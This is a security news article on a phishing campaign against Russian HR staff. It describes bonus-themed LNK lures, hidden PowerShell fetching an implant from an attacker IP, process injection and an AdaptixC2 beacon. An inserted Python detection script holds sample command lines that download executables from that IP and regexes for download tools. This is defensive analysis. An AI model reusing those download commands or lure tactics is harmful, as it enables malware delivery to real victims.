A sophisticated attack campaign known as Operation DupeHike has emerged as a significant threat to Russian corporate environments, specifically targeting employees in human resources, payroll, and administrative departments.
The campaign, attributed to the threat group UNG0902, uses carefully crafted decoy documents themed around employee bonuses and internal financial policies to deliver a previously unknown malware ecosystem to victims' machines.
The attack begins with spear-phishing emails carrying ZIP archives disguised as legitimate corporate documents.
These archives are named “Премия 2025.zip” (“Bonus.zip” in English) and contain malicious shortcut files (.LNK) that masquerade as PDF documents, using filenames such as “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk” to trick recipients into opening them.
Seqrite security analysts identified the campaign after discovering a malicious ZIP archive on VirusTotal on November 21, 2025.
The research team noted that the threat actor shows a detailed understanding of Russian corporate HR workflows, crafting decoy documents that outline realistic bonus structures tied to performance metrics, KPIs, and organizational goals.
The lure document references Russia's Labor Code and sets a default bonus rate of 15 percent of annual salary, making convincing social-engineering material for targeting employees in finance departments.
Infection Mechanism and Technical Breakdown
The attack chain operates in three distinct phases, beginning with malicious LNK execution. When a victim opens the shortcut file, PowerShell runs hidden in the background using specific switches: the NoNI, nop, and w hidden parameters (non-interactive session, no profile, hidden window).
Infection chain (Source – Seqrite)
The script uses Invoke-WebRequest to download a second-stage implant called DUPERUNNER from the attacker-controlled server at 46.149.71.230.
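As an added example (not code from Seqrite's report), the following Python triage helper scans process-creation records for the combination described above: PowerShell launched with the NoNI, nop and w hidden switches together with an Invoke-WebRequest (or alias) download from a bare IP address. The event shape and sample command lines are constructed; only the flag set and the 46.149.71.230 address come from the article, and the second address is from the documentation range.

```python
import re

# Constructed process-creation records in a Sysmon-like shape (not real telemetry).
# Only the flag set and the 46.149.71.230 address come from the Seqrite write-up;
# the second address is from the 198.51.100.0/24 documentation range.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -NoNI -nop -w hidden -c "Invoke-WebRequest -Uri http://46.149.71.230/upd -OutFile $env:TEMP\a.exe"'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -nop -w hidden -NoNI iwr http://198.51.100.7/x -OutFile C:\Users\Public\x.exe"},
]

# The three switches reported for the LNK stage, including their long forms.
FLAG_PATTERNS = {
    "NoNI": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "nop": re.compile(r"-nop(?:rofile)?\b", re.I),
    "w hidden": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
}

# Invoke-WebRequest or one of its built-in aliases (iwr, curl, wget in Windows
# PowerShell 5.x) fetching from a bare IPv4 address instead of a hostname.
DOWNLOAD_FROM_IP = re.compile(
    r"\b(?:invoke-webrequest|iwr|curl|wget)\b.*?https?://(\d{1,3}(?:\.\d{1,3}){3})", re.I
)


def analyze(event):
    """Return which reported flags appear and the bare-IP download host, if any."""
    cmd = event["cmdline"]
    flags = [name for name, pat in FLAG_PATTERNS.items() if pat.search(cmd)]
    match = DOWNLOAD_FROM_IP.search(cmd)
    ip = match.group(1) if match else None
    # Alert only on the full combination: -nop or a hidden window alone is
    # common in legitimate scheduled tasks and would flood the queue.
    return {"flags": flags, "download_ip": ip, "alert": len(flags) == 3 and ip is not None}


def find_alerts(events):
    """Triage a batch of events and keep those matching the full LNK-stage pattern."""
    return [dict(analyze(e), parent=e["parent"]) for e in events if analyze(e)["alert"]]


if __name__ == "__main__":
    for hit in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT parent={hit['parent']} flags={hit['flags']} c2={hit['download_ip']}")
```

The explorer.exe parent is not used as a signal because any shortcut a user double-clicks produces the same parent; the flag combination plus a direct-to-IP fetch is what separates this chain from routine administration.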
DUPERUNNER, a compiled C++ implant, performs key reconnaissance and injection operations. The malware contains several capabilities designed for maintaining persistence and evading detection.
It enumerates target processes including explorer.exe, notepad.exe, and msedge.exe for injection while simultaneously downloading decoy PDFs to display to users, creating the illusion of legitimate document handling.
The implant then performs remote thread injection to load the final payload: an AdaptixC2 beacon. This command-and-control beacon uses HTTP POST requests to communicate with attacker infrastructure, enabling remote command execution and data exfiltration.
The beacon resolves Windows APIs dynamically using djb2-style hashing of function names to avoid static detection signatures.
Default port configuration for the AdaptixC2 HTTP beacon (Source – Seqrite)
Seqrite researchers extracted configuration artifacts revealing the beacon identification numbers and command-and-control infrastructure hosted on servers under ASN 48282 and AS 9123, operated by VDSINA-AS and TIMEWEB-AS.
The infrastructure shows a port change from port 80 during implant delivery to port 443 for final beacon operations, indicating ongoing refinement of the attack infrastructure.
This campaign reflects an evolving threat landscape in which sophisticated social engineering combines with advanced malware capabilities to target corporate environments in Eastern Europe.
